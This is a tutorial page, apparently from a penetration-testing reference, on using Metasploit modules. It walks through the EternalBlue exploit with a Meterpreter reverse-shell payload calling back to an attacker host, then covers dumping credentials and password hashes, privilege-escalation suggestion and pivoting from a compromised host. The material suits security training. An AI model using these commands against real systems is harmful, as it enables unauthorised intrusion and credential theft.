Skip to main content

Modules


Module Types​

TypePath PrefixPurpose
exploitexploit/Delivers a payload by exploiting a vulnerability
auxiliaryauxiliary/Scanning, enumeration, fuzzing, credential testing - no payload
postpost/Post-exploitation actions run against an established session
payloadpayload/Code executed on the target after exploitation
encoderencoder/Obfuscates payload to evade signature detection
nopnop/NOP sled generators - rarely used directly

The Standard Workflow​

search β†’ use β†’ info β†’ show options β†’ set β†’ [show payloads] β†’ set PAYLOAD β†’ run

Step by Step​

# 1. Find the module
msf6 > search ms17_010

# 2. Select it (use index number or full path)
msf6 > use 0
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# 3. Review what it does and what it needs
msf6 (exploit/windows/smb/ms17_010_eternalblue) > info

# 4. See all required and optional settings
msf6 > show options

# 5. See available payloads for this module
msf6 > show payloads

# 6. Set options
msf6 > set RHOSTS <TARGET_IP>
msf6 > set PAYLOAD windows/x64/meterpreter_reverse_https
msf6 > set LHOST <KALI_IP>
msf6 > set LPORT 443

# 7. Verify nothing is missing
msf6 > show options

# 8. Run
msf6 > run
# or
msf6 > exploit

# Run as background job (non-blocking)
msf6 > run -j
msf6 > exploit -j

show options - Reading the Output​

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes Target address(es)
RPORT 445 yes Target port
SMBDomain no Domain (optional)
SMBPass no Password (optional)
SMBUser no Username (optional)
VERIFY_ARCH true yes Check target arch
VERIFY_TARGET true yes Check target OS
  • Required = yes, no Current Setting β†’ must set before running
  • Required = no β†’ optional; set if needed for the scenario
  • Options already populated by setg will show their global values here

show targets​

Some exploit modules support multiple target configurations (different OS versions, service packs, offsets):

msf6 > show targets

Exploit targets:

Id Name
-- ----
0 Automatic Target
1 Windows 7
2 Windows Embedded Standard 7
3 Windows Server 2008 R2
msf6 > set TARGET 0

Use Automatic unless you know a specific target version and need precision.


check​

Some exploit modules support a check command - tests if the target is vulnerable without exploiting it. Not all modules support this.

msf6 > check
[*] 10.10.10.50:445 - The target is vulnerable.

Post Modules​

Post modules run against an existing Meterpreter session. They perform specific actions (enumeration, credential extraction, pivoting setup) without requiring a new exploit.

# Run a post module against session 1
msf6 > use post/windows/gather/hashdump
msf6 > set SESSION 1
msf6 > run

# Shortcut from inside a Meterpreter session
meterpreter > run post/windows/gather/hashdump
meterpreter > run post/multi/recon/local_exploit_suggester

Useful Post Modules​

ModulePurpose
post/windows/gather/hashdumpDump local SAM hashes
post/windows/gather/credentials/credential_collectorCollect cached credentials
post/multi/recon/local_exploit_suggesterSuggest local privesc exploits for the current session
post/windows/manage/migrateMigrate Meterpreter to another process
post/multi/manage/autorouteAdd routes through the session for pivoting
post/windows/gather/enum_domainEnumerate domain info from compromised host
post/windows/gather/arp_scannerARP scan from the compromised host

Filtering Options and Payloads​

When show payloads or show options returns a long list, filter with grep:

msf6 > grep meterpreter show payloads
msf6 > grep x64 show payloads
msf6 > grep required show options

Using Modules Against Multiple Targets​

# Set multiple individual targets
msf6 > set RHOSTS 10.10.10.50,10.10.10.51,10.10.10.52

# Set a range
msf6 > set RHOSTS 10.10.10.50-60

# Set a CIDR range
msf6 > set RHOSTS 10.10.10.0/24

# Load from a file
msf6 > set RHOSTS file:/tmp/targets.txt

# Load from DB (all hosts)
msf6 > hosts -R

Set THREADS for concurrent execution on auxiliary/scanner modules:

msf6 > set THREADS 10